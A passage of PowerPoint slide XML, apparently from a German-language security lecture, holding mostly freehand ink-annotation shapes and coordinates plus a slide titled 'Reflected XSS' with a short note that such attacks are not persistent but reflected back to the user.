          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838615" y="547149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E303561-2809-4018-A4A1-8D43E7846174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6C01D7EE-F64A-4F37-A7AC-CDE68D757D3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8E66B253-78CF-426F-BBCD-6D8C0CDC7C23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18AF9096-0301-4CB1-A9E8-0681BDB75A25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D4C573B5-D355-4888-93FD-13CE773DD37C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9BA22D1C-DA48-4AD6-B35E-BDE8EBAC2458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25046F34-AB03-407D-ACFE-A9BE9B0D4D6F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0246770D-FC90-415E-ADD4-01821FE77D45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B32F8C8-B476-446C-ADAA-493F8C479FD9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F38376E0-E5E5-45AE-8420-F43EE8E8477A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E77F98BA-76C7-493D-891B-349FD0EBEB82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2E085404-5C04-4A2B-B64D-B9DC7338E39C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C501CF93-3C6F-40A4-A21F-34699DE39470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5E0EF96-9BDD-4544-81DD-13856536C6A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9B67ADB9-E23E-4217-8C13-25877BE929C4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B78F58A-35BA-452B-8770-898424EB8F7F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825D0CE-8EE1-413E-A7B6-EFCBED9287CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="812335" y="995367"/>
            <a:ext cx="1361520" cy="318240"/>
            <a:chOff x="3729526" y="1005434"/>
            <a:chExt cx="1361520" cy="318240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2E1E8174-2710-4D91-A4D8-9AFF47E38E2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3729526" y="1005434"/>
              <a:ext cx="1055520" cy="318240"/>
              <a:chOff x="3729526" y="1005434"/>
              <a:chExt cx="1055520" cy="31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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3729526" y="1005434"/>
                  <a:ext cx="229320" cy="318240"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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720526" y="996434"/>
                    <a:ext cx="24696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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3775966" y="1163834"/>
                  <a:ext cx="100440" cy="1584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767326" y="1154834"/>
                    <a:ext cx="11808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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4019326" y="1006874"/>
                  <a:ext cx="21600" cy="29916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010686" y="997874"/>
                    <a:ext cx="3924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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3973966" y="1096154"/>
                  <a:ext cx="119160" cy="12960"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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964966" y="1087514"/>
                    <a:ext cx="1368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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4179526" y="1013354"/>
                  <a:ext cx="37440" cy="29700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4170526" y="1004354"/>
                    <a:ext cx="5508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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4094206" y="1089674"/>
                  <a:ext cx="177480" cy="33120"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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4085206" y="1080674"/>
                    <a:ext cx="19512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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4294726" y="1167794"/>
                  <a:ext cx="118080" cy="11808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286086" y="1158794"/>
                    <a:ext cx="1357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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4423966" y="1165634"/>
                  <a:ext cx="57240" cy="108360"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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414966" y="1156994"/>
                    <a:ext cx="7488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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4535926" y="1176794"/>
                  <a:ext cx="124920" cy="10908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526926" y="1168154"/>
                    <a:ext cx="14256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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4672006" y="1061234"/>
                  <a:ext cx="24120" cy="229320"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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4663366" y="1052594"/>
                    <a:ext cx="4176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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4706926" y="1144034"/>
                  <a:ext cx="78120" cy="140040"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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4697926" y="1135394"/>
                    <a:ext cx="9576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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4830766" y="1146554"/>
                <a:ext cx="120960" cy="11592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22126" y="1137554"/>
                  <a:ext cx="138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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4994566" y="1115954"/>
                <a:ext cx="96480" cy="163080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns=""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85926" y="1106954"/>
                  <a:ext cx="114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92D00B66-3C9C-4F21-9A79-2112801EDF94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="688966" y="840914"/>
            <a:ext cx="1555200" cy="87840"/>
            <a:chOff x="688966" y="840914"/>
            <a:chExt cx="155520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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="688966" y="914354"/>
                <a:ext cx="91440" cy="1440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9966" y="905354"/>
                  <a:ext cx="109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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="889846" y="886274"/>
                <a:ext cx="97200" cy="1368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1206" y="877634"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1107286" y="886994"/>
                <a:ext cx="109080" cy="1296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98286" y="878354"/>
                  <a:ext cx="126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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1324366" y="876914"/>
                <a:ext cx="93600" cy="1044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15726" y="867914"/>
                  <a:ext cx="111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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1533886" y="882314"/>
                <a:ext cx="93600" cy="90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24886" y="873674"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1716046" y="878714"/>
                <a:ext cx="116640" cy="576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07406" y="870074"/>
                  <a:ext cx="134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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1964446" y="857114"/>
                <a:ext cx="87840" cy="864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55806" y="848474"/>
                  <a:ext cx="105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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2154526" y="840914"/>
                <a:ext cx="89640" cy="1548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45886" y="831914"/>
                  <a:ext cx="1072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itel 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F45A1A35-8585-4E0F-8173-629513646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404" y="365125"/>
            <a:ext cx="6886636" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0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57607C94-DAD3-468A-8795-4292A0891A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6467494" y="4674860"/>
            <a:ext cx="57392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2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>not persistent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just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„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reflected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“ back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user</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" sz="20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D4CE603-A673-497E-9A02-7232103B4CE8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3" name="Freihand 102">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{481EF7BC-56AB-49DF-9168-99541C5C782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C6DF9B6C-AF88-4117-BE7C-BE3E509C342B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66353431-2C8E-4E17-98A8-F575B0C81D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="2814200">
            <a:off x="574889" y="1950446"/>
            <a:ext cx="336960" cy="214560"/>
            <a:chOff x="2721526" y="1425194"/>
            <a:chExt cx="33696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41ED303C-B50E-4770-82F1-7C69D01A031F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2721526" y="1425194"/>
                <a:ext cx="201600" cy="21456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41ED303C-B50E-4770-82F1-7C69D01A031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712886" y="1416554"/>
                  <a:ext cx="2192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06D9FDB5-AE1C-40FA-95D6-7524226AAB65}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3031126" y="1617794"/>
                <a:ext cx="27360" cy="468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06D9FDB5-AE1C-40FA-95D6-7524226AAB6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022486" y="1608794"/>
                  <a:ext cx="4500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DB56F79F-5F4A-4DB4-A8F4-5CAC30154DFC}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11392512" y="2816594"/>
              <a:ext cx="360" cy="36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DB56F79F-5F4A-4DB4-A8F4-5CAC30154DFC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1383512" y="280759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FD42984-1DF0-482E-9162-40CA94F24DAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4959286" y="2641634"/>
            <a:ext cx="824760" cy="263160"/>
            <a:chOff x="4959286" y="2641634"/>
            <a:chExt cx="82476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BB64F29C-5F88-487E-9CA2-949F087D30B9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4959286" y="2721554"/>
                <a:ext cx="126720" cy="18324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BB64F29C-5F88-487E-9CA2-949F087D30B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950286" y="2712554"/>
                  <a:ext cx="144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60DD9D7F-8B17-4778-B26D-3DF76EFA67E0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5160886" y="2885354"/>
                <a:ext cx="14040" cy="1368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60DD9D7F-8B17-4778-B26D-3DF76EFA67E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152246" y="2876354"/>
                  <a:ext cx="31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1D15EAE0-765A-4A78-BAE1-A7D162C529BF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5281126" y="2721194"/>
                <a:ext cx="21600" cy="10800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1D15EAE0-765A-4A78-BAE1-A7D162C529B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272486" y="2712554"/>
                  <a:ext cx="39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5E4DBDA7-9033-4607-871B-9507C23EF41D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5273566" y="2641634"/>
                <a:ext cx="208440" cy="1666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5E4DBDA7-9033-4607-871B-9507C23EF41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64566" y="2632634"/>
                  <a:ext cx="226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BE7FBDEF-6D50-4B2C-A17C-467AF58D0259}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5483086" y="2675834"/>
                <a:ext cx="139320" cy="8964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BE7FBDEF-6D50-4B2C-A17C-467AF58D025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74086" y="2667194"/>
                  <a:ext cx="156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898221B-D0D5-48C5-9A0D-8E40CA910A39}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5633566" y="2662154"/>
                <a:ext cx="150480" cy="17460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898221B-D0D5-48C5-9A0D-8E40CA910A3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624566" y="2653154"/>
                  <a:ext cx="1681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286C256F-FB33-4FF8-9BE2-19B7E4B2A50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5905726" y="2610674"/>
            <a:ext cx="1387800" cy="268560"/>
            <a:chOff x="5905726" y="2610674"/>
            <a:chExt cx="138780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01598933-2F45-44F6-B6B4-1CCAFB4DBCFF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5905726" y="2665034"/>
                <a:ext cx="8280" cy="8748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01598933-2F45-44F6-B6B4-1CCAFB4DBCF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896726" y="2656394"/>
                  <a:ext cx="25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3F41CA87-C7F1-44D3-AA93-98E425BF19B9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5906446" y="2621474"/>
                <a:ext cx="27000" cy="792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3F41CA87-C7F1-44D3-AA93-98E425BF19B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897446" y="2612834"/>
                  <a:ext cx="446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A10A63DA-9D41-45B5-95D7-FFED72E07350}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5978806" y="2643794"/>
                <a:ext cx="113760" cy="11304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A10A63DA-9D41-45B5-95D7-FFED72E0735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970166" y="263515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84B86A3B-4C4F-42C9-924D-3B91710B62ED}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6137926" y="2669354"/>
                <a:ext cx="113400" cy="77040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns=""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84B86A3B-4C4F-42C9-924D-3B91710B62E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129286" y="2660714"/>
                  <a:ext cx="131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7D318A45-BC41-4CBA-8177-4C3188B162CD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6301006" y="2610674"/>
                <a:ext cx="55080" cy="13320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7D318A45-BC41-4CBA-8177-4C3188B162C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292366" y="2601674"/>
                  <a:ext cx="72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E821DBE4-B0B8-43C4-9E7C-3D70C4A5BEEE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6398566" y="2756834"/>
                <a:ext cx="11880" cy="684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E821DBE4-B0B8-43C4-9E7C-3D70C4A5BEE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389566" y="2747834"/>
                  <a:ext cx="29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5A21A807-5845-4BF2-B3ED-DFEAD5C580C0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6460486" y="2695994"/>
                <a:ext cx="47160" cy="146880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns=""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5A21A807-5845-4BF2-B3ED-DFEAD5C580C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451846" y="2686994"/>
                  <a:ext cx="64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6C0E890B-A878-4A89-BD0D-239D84F81C12}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6479926" y="2703914"/>
                <a:ext cx="105120" cy="7200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6C0E890B-A878-4A89-BD0D-239D84F81C1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470926" y="2694914"/>
                  <a:ext cx="122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6" name="Freihand 115">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83AEA8A9-2E75-406C-8DF0-BE3C11968AFB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6607726" y="2726594"/>
                <a:ext cx="70560" cy="59760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="116" name="Freihand 115">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83AEA8A9-2E75-406C-8DF0-BE3C11968AF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598726" y="2717594"/>
                  <a:ext cx="88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450A7ABC-7DC1-4FC0-BBDD-91714469EE4E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6671806" y="2721914"/>
                <a:ext cx="29520" cy="84240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="118" name="Freihand 117">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{450A7ABC-7DC1-4FC0-BBDD-91714469EE4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663166" y="2712914"/>
                  <a:ext cx="47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944C4D0-26A4-4022-9ECC-4D97E7B6530D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6744166" y="2741354"/>
                <a:ext cx="57960" cy="48600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="119" name="Freihand 118">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0944C4D0-26A4-4022-9ECC-4D97E7B6530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735526" y="2732714"/>
                  <a:ext cx="756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5FA0954B-1273-4E7B-B323-0B1DDB9CC760}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6720406" y="2761154"/>
                <a:ext cx="105120" cy="115920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="122" name="Freihand 121">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FA0954B-1273-4E7B-B323-0B1DDB9CC76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711766" y="2752154"/>
                  <a:ext cx="122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A0F15A1A-EB35-495C-87FD-A762469539B1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6853966" y="2695634"/>
                <a:ext cx="72360" cy="118800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="123" name="Freihand 122">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0F15A1A-EB35-495C-87FD-A762469539B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845326" y="2686994"/>
                  <a:ext cx="90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E32B135A-D4E6-469D-802D-BF3C7B12F3FA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6933526" y="2775914"/>
                <a:ext cx="91080" cy="46440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="124" name="Freihand 123">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32B135A-D4E6-469D-802D-BF3C7B12F3F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924526" y="2767274"/>
                  <a:ext cx="108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224799D9-D01B-4859-A968-321DAEE88E8E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7042966" y="2786714"/>
                <a:ext cx="84600" cy="86040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="125" name="Freihand 124">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224799D9-D01B-4859-A968-321DAEE88E8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033966" y="2778074"/>
                  <a:ext cx="1022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8" name="Freihand 127">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5410EA62-1B58-4891-9D8B-DCD8840595A4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7158526" y="2811194"/>
                <a:ext cx="89640" cy="68040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="128" name="Freihand 127">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5410EA62-1B58-4891-9D8B-DCD8840595A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149886" y="2802554"/>
                  <a:ext cx="1072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9" name="Freihand 128">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5FD7754-F517-45BD-B4AA-464708E264EB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7263646" y="2741354"/>
                <a:ext cx="29880" cy="126360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="129" name="Freihand 128">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5FD7754-F517-45BD-B4AA-464708E264E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254646" y="2732714"/>
                  <a:ext cx="4752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C680B792-8BD2-4360-8C7D-93BE15F8D760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10105512" y="3017474"/>
            <a:ext cx="194040" cy="184680"/>
            <a:chOff x="9832246" y="3017474"/>
            <a:chExt cx="19404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1" name="Freihand 130">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6E924A-1790-4377-842D-631D72B3E1D0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9832246" y="3017474"/>
                <a:ext cx="99360" cy="182520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="131" name="Freihand 130">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6E924A-1790-4377-842D-631D72B3E1D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823246" y="3008834"/>
                  <a:ext cx="117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2" name="Freihand 131">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624B4FC6-8A1B-4A81-93AC-D860D6686B94}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10017646" y="3190274"/>
                <a:ext cx="8640" cy="11880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="132" name="Freihand 131">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624B4FC6-8A1B-4A81-93AC-D860D6686B9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009006" y="3181634"/>
                  <a:ext cx="262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1608AB3B-BCAC-49DC-B631-2DAC30B9883B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10349232" y="2942234"/>
            <a:ext cx="1729800" cy="239400"/>
            <a:chOff x="10075966" y="2942234"/>
            <a:chExt cx="172980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4" name="Freihand 133">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D62FAF4E-6A3B-4C5B-AFD3-A7FAAD1EAA33}"/>
                    </a:ext>
                  </a:extLst>
